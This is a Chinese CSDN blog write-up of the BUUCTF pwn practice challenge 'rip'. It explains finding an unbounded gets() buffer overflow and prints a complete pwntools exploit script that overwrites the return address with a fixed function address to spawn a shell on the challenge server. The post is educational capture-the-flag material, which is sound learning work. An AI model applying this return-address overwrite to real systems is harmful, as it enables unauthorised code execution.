BUUCTF_2.RIP覆盖一下

最新推荐文章于 2024-05-12 10:51:22 发布
最新推荐文章于 2024-05-12 10:51:22 发布
阅读量3.7k 收藏
点赞数
分类专栏: # BUUCTF_pwn 文章标签: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/94766090
版权

解题思路

1. 查看文件信息,安全机制
2. 代码审计
3. 分析漏洞点
4. 编写EXP

1.基本信息

$checksec ./文件名
在这里插入图片描述

2.代码审计

不管在简单题都一定要IDA查看一下伪代码(IDA做好是7.0以上的版本)
在这里插入图片描述
首先查看敏感字符串(Ctrl+1)
在这里插入图片描述
1.gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。
2.从stdin流中读取字符串,直至接受到换行符或EOF时停止,并将读取的结果存放在buffer指针所指向的字符数组中。换行符不作为读取串的内容,读取的换行符被转换为‘\0’空字符,并由此来结束字符串。

分析漏洞

利用填充数据到我们EIP的大小,进行覆盖ret到达我们的shell (EIP=15+8)
个人建议利用peda和gef 两个工具联合起来使用
找bin/sh字符串的地址
在这里插入图片描述

编写EXP

这里我将脚本都写的比较复杂,就是为了提前使用这些函数的用法,养成一个好的书写习惯(风格)

#!/usr/bin/env python
#coding=utf8
from pwn import *
context.log_level = 'debug'   #显示调试的信息
context.terminal = ['gnome-terminal','-x','bash','-c']   #?

local = 0  #设置是本地还是远程渗透

if local:
    p = process('./pwn1')
    #bin = ELF('./',checksec=False)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
else:
    p=remote('buuoj.cn',6001)
    #bin = ELF('./',checksec=False)
    #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    pass

bin_sh_addr = 0x0401186
payload = "A"*23 + p64(bin_sh_addr)

def choose2():
	#p.recvuntil("please input\n")  这个在一般情况是需要添加的  可是这个题不知道为什么添加就不执行shell了
	p.sendline(payload)
	
#raw_input()  用来断在开始的位置
#gdb.attach(p)  可以用动态调试

	p.interactive()

choose2()
Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
FlashFXP_3.0.1015_SC_Rip.rar
08-19
在这款“FlashFXP_3.0.1015_SC_Rip.rar”压缩包中,包含了FlashFXP的绿色免安装版本,这使得用户无需复杂的安装过程即可快速启动并使用这一工具。 1. **免安装版本的优势** 免安装版的FlashFXP具有便携性,用户...
Devil_May_Cry.CHS.Full.Rip-Gamersky.torrent
02-14
Devil_May_Cry.CHS.Full.Rip-Gamersky.torrent
[buuctf] rip
zn106414的博客
03-31 685
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
BUUCTF-rip
m0_64180167的博客
04-11 652
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF中 web 总结合集(正在更新中)
最新发布
2401_84969231的博客
05-12 373
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1094
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTF -rip
weixin_56301399的博客
07-20 383
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7534
BUUCTF题目Misc部分wp(持续更新)
rip_test.rar_rip
09-24
2. **周期性更新**:RIP路由器每隔30秒广播一次其路由表,以使网络中的其他路由器了解其可达的网络。 3. **距离向量算法**:RIP使用Bellman-Ford算法计算最短路径,通过收集相邻路由器的路由信息,计算到每个网络的...
TCG_MPWG_RIP_r106_published.pdf
07-21
TCG 在 mobile 领域的技术规范
IPok_RIP.pkt
04-11
IPok_RIP.pkt
BUUCTF Misc杂项前十二道题的思路和感悟
热门推荐
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
BUUCTF】Web题解
xuanyulevel6的博客
08-08 5136
BUUCTF】Web题解
BUUCTF逆向第14题刮开有奖
Knozya的博客
01-31 747
而我们已知flag长度为8,后六位我们解码已得出,但是不知道顺序,现在需推断出前两位,因为上面破解的长字符串中(也就是sub_4010F0中)的结果可知前两位为'U' 'J',又因为第三位为‘W’接下来我们继续跟进sub_401000,内容多的有点懵了,往下滑发现有个byte_407830可以跟进。又发现sub_4010F0和sub_401000可能对字符串做出了改变,分别跟进,先跟进前者,如下。跟进后不难发现为base64编码形式,也就是说我们需要对其所对应的v4和v5进行解码,结果如下。
[BUUCTF] 刮开有奖
m0_68259687的博客
06-11 303
大概如下修改,将(a1+数字)视为数组里面的编号,其中注意将偏移中乘4操作去掉(机器语言地址+4),总的来说哪里红了改哪里。想起搜索字符串的时候搜到过base64 的base,猜测第二个处理的函数sub_40100为base64加密。进入对v7进行某种操作的函数sub_4010F0,分析后发现应该是要使用脚本来反推。按照下面这段的逻辑拼接出string即为flag。随手在函数和字符串中搜索flag,没有发现。双击进入DialogFunc这个函数,分析。拖入IDA中,嗯,看函数应该没有加壳。
BUUCTF 另外一个世界 1
YueXuan_521的博客
11-03 669
BUUCTF 另外一个世界 1
[buuctf]刮开有奖
逆向萌新的博客
08-11 1525
buuctf 刮开有奖
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1276
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3846
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
fmt_ninjaripper_rip.py
09-25
fmt_ninjaripper_rip.py是一个用于使用NinjaRipper软件进行游戏资源提取的Python脚本。NinjaRipper是一种专门用于抓取游戏中的3D模型、纹理和其他资源的工具。该脚本可以帮助用户更简便地使用NinjaRipper进行提取。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值